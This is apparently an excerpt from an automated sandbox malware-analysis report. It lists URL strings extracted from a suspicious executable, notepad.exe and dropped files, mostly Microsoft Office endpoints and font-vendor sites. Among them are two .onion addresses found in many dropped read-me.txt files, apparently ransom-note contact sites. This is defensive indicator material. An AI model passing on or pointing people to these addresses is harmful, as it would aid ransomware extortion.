                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                      Source: notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, read-me.txt27.7.dr, read-me.txt6.23.dr, read-me.txt7.7.dr, read-me.txt4.23.dr, read-me.txt24.7.dr, read-me.txt28.7.dr, read-me.txt4.7.dr, read-me.txt1.15.dr, read-me.txt30.7.dr, read-me.txt13.7.dr, read-me.txt14.7.dr, read-me.txt23.7.dr, read-me.txt.7.dr, read-me.txt11.7.dr, read-me.txt5.7.dr, read-me.txt25.7.dr, read-me.txt9.15.dr, read-me.txt2.23.dr, read-me.txt0.23.dr, read-me.txt3.15.dr, read-me.txt20.7.dr, read-me.txt16.7.dr, read-me.txt5.15.dr, read-me.txt1.7.dr, read-me.txt10.15.dr, read-me.txt8.15.dr, read-me.txt6.7.dr, read-me.txt18.7.dr, read-me.txt26.7.dr, read-me.txt0.15.dr, read-me.txt7.15.dr, read-me.txt15.7.dr, read-me.txt6.15.dr, read-me.txt1.23.dr, read-me.txt3.23.dr, read-me.txt5.23.dr, read-me.txt.23.dr, read-me.txt2.7.dr, read-me.txt8.7.dr, read-me.txt.15.dr, read-me.txt22.7.dr, read-me.txt12.7.dr, read-me.txt7.23.dr, read-me.txt0.7.dr, read-me.txt10.7.dr, read-me.txt9.7.dr, read-me.txt29.7.dr, read-me.txt3.7.dr, read-me.txt21.7.dr, read-me.txt4.15.dr, read-me.txt19.7.dr, read-me.txt2.15.dr, read-me.txt17.7.drString found in binary or memory: http://helpqvrg3cc5mvb3.onion/
                      Source: notepad.exe, 00000018.00000002.590021238.0000022DB7FD5000.00000004.00000020.sdmp, read-me.txt27.7.dr, read-me.txt6.23.dr, read-me.txt7.7.dr, read-me.txt4.23.dr, read-me.txt24.7.dr, read-me.txt28.7.dr, read-me.txt4.7.dr, read-me.txt1.15.dr, read-me.txt30.7.dr, read-me.txt13.7.dr, read-me.txt14.7.dr, read-me.txt23.7.dr, read-me.txt.7.dr, read-me.txt11.7.dr, read-me.txt5.7.dr, read-me.txt25.7.dr, read-me.txt9.15.dr, read-me.txt2.23.dr, read-me.txt0.23.dr, read-me.txt3.15.dr, read-me.txt20.7.dr, read-me.txt16.7.dr, read-me.txt5.15.dr, read-me.txt1.7.dr, read-me.txt10.15.dr, read-me.txt8.15.dr, read-me.txt6.7.dr, read-me.txt18.7.dr, read-me.txt26.7.dr, read-me.txt0.15.dr, read-me.txt7.15.dr, read-me.txt15.7.dr, read-me.txt6.15.dr, read-me.txt1.23.dr, read-me.txt3.23.dr, read-me.txt5.23.dr, read-me.txt.23.dr, read-me.txt2.7.dr, read-me.txt8.7.dr, read-me.txt.15.dr, read-me.txt22.7.dr, read-me.txt12.7.dr, read-me.txt7.23.dr, read-me.txt0.7.dr, read-me.txt10.7.dr, read-me.txt9.7.dr, read-me.txt29.7.dr, read-me.txt3.7.dr, read-me.txt21.7.dr, read-me.txt4.15.dr, read-me.txt19.7.dr, read-me.txt2.15.dr, read-me.txt17.7.drString found in binary or memory: http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.331874084.0000000002C21000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000A.00000002.389216756.0000000002931000.00000004.00000001.sdmp, Mm7Yq5V7Lu.exe, 0000000C.00000002.419056283.0000000002DD1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: Mm7Yq5V7Lu.exe, 00000001.00000002.338812395.0000000006E12000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.aadrm.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.aadrm.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.addins.store.office.com/app/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.cortana.ai
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.diagnostics.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.diagnosticssdf.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.microsoftstream.com/api/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.office.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.onedrive.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://apis.live.net/v5.0/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://augloop.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://augloop.office.com/v2
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://autodiscover-s.outlook.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                      Source: Mm7Yq5V7Lu.exe, 00000007.00000003.503864394.0000000001584000.00000004.00000001.sdmp, f[1].txt.7.drString found in binary or memory: https://bid.g.doubleclick.net/xbbe/pixel?d=KAE
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cdn.entity.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://clients.config.office.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://config.edge.skype.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cortana.ai
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cortana.ai/api
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://cr.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dataservice.o365filtering.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dataservice.o365filtering.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dev.cortana.ai
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://devnull.onenote.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://directory.services.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ecs.office.com/config/v2/Office
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://entitlement.diagnostics.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://globaldisco.crm.dynamics.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://graph.ppe.windows.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://graph.ppe.windows.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://graph.windows.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://graph.windows.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://incidents.diagnostics.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://inclient.store.office.com/gyro/client
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://inclient.store.office.com/gyro/clientstore
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://invites.office.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://lifecycle.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://login.microsoftonline.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://login.windows.local
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://management.azure.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://management.azure.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://messaging.office.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ncus.contentsync.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ncus.pagecontentsync.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://officeapps.live.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://officeci.azurewebsites.net/api/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://onedrive.live.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://onedrive.live.com/embed?
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://osi.office.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://otelrules.azureedge.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office365.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office365.com/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://pages.store.office.com/review/query
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://powerlift.acompli.net
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://roaming.edog.
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://settings.outlook.com
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://shell.suite.office.com:1443
                      Source: 25C835F8-92DB-4E87-B21B-07E593442637.18.drString found in binary or memory: https://skyapi.live.net/Activity/
